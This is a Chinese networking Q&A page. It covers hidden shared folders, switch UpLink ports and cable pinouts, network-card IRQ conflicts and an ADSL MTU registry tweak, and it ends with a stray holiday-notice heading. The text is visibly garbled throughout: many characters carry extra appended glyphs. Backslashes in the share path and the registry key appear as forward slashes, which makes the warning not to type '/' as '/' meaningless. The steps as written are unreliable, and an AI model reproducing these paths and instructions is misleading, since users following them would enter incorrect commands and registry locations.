這樣一來(lái),絕對(duì)保證別人從網(wǎng)上鄰居中看不到這個(gè)共享目錄的!那~~自己想從異地機(jī)上進(jìn)入并實(shí)現(xiàn)完全操作時(shí)怎么辦呢?呵呵,這么辦:從異地機(jī)的地址欄中鍵入“//(機(jī)器名)/$(你的共享目錄名)”并“ENTER”,再輸入密碼并確定后,就進(jìn)入啦!這樣你可靜悄悄地實(shí)現(xiàn)異地機(jī)上在自己設(shè)定的共享目錄內(nèi)進(jìn)行完全操作啦!不過(guò)注意其中“/”不能誤輸入成“/”
問:如何使用交換機(jī)的UpLink端口,怎樣連接?使用了UpLink口后,是否還可以使用其相鄰最近的端口?
答:UpLink口是交換機(jī)上常見的一種端口,它是為了便于兩臺(tái)交換機(jī)之間進(jìn)行級(jí)聯(lián)的端口。它與其相鄰的普通UTP口使用的是同一通道,因而,如果使用了UpLink口,另一個(gè)與之相鄰的普通端口就不能再使用了。這兩個(gè)端口稱為共享端口,不能同時(shí)使用。級(jí)聯(lián)的時(shí)候,你可使用一般的網(wǎng)線(網(wǎng)線的兩端都遵循同一標(biāo)準(zhǔn),即同是EIA/TIA 568A或568B)將一個(gè)交換機(jī)的普通端口和另一個(gè)交換機(jī)的UpLink口連起來(lái)。如兩個(gè)設(shè)備都使用UpLink口連接,網(wǎng)線需要一端使用EIA/TIA 568A的標(biāo)準(zhǔn),另一端使用EIA/TIA 568B的標(biāo)準(zhǔn)(如下表)。
標(biāo)準(zhǔn)568a 標(biāo)準(zhǔn)568b
橙白1 綠白1
橙2 綠2
綠白 3 橙白3
藍(lán)4 藍(lán)4
藍(lán)白5 藍(lán)白5
綠6 橙6
棕白7 棕白7
棕8 棕8
問:我在安裝網(wǎng)卡后,在“系統(tǒng)→設(shè)備管理器”中網(wǎng)卡出現(xiàn)黃色的“!”號(hào),請(qǐng)問該如何解決?
答:網(wǎng)卡較容易與其他設(shè)備發(fā)生資源沖突,尤其是在系統(tǒng)中安裝有多個(gè)插卡的情況下,解決辦法是:
1、更換網(wǎng)卡在主板插槽上的位置是最好的解決辦法。
2、在該網(wǎng)卡“屬性”窗口“資源”標(biāo)簽中找到“資源類型”列表,選定發(fā)生沖突的“資源”,按“更改設(shè)置”按鈕,更改發(fā)生沖突的IRQ中斷號(hào)或者I/O地址。
3、有些PCI網(wǎng)卡會(huì)強(qiáng)行占用IRQ10,與一些強(qiáng)行占用IRQ10的顯示卡發(fā)生IRQ中斷沖突,如果遇到這種情況,可在BIOS中將“Assign IRQ For VGA”項(xiàng)設(shè)置為Disabled,不給顯示卡分配固定的中斷。
4、運(yùn)行網(wǎng)卡附帶的軟盤中的設(shè)置程序,將網(wǎng)卡設(shè)置為非PNP模式,設(shè)置IRQ中斷號(hào)和I/O地址為系統(tǒng)未占用的地址;并在BIOS中將相應(yīng)中斷號(hào)由PCI/ISA改為L(zhǎng)egacy ISA。
如果使用上述方法均不能解決故障,建議換一塊網(wǎng)卡試試。
問:ADSL上網(wǎng)網(wǎng)頁(yè)打不開的問題?
答:是MTU的問題!改一下注冊(cè)表!
HKEY_LOCAL_MACHINE/System/CurrentControlSet/Services/Class/NetTrans/0000/主鍵下面建立字符串鍵名為MaxMTU,鍵值為1450
2020端午節(jié)放假通知
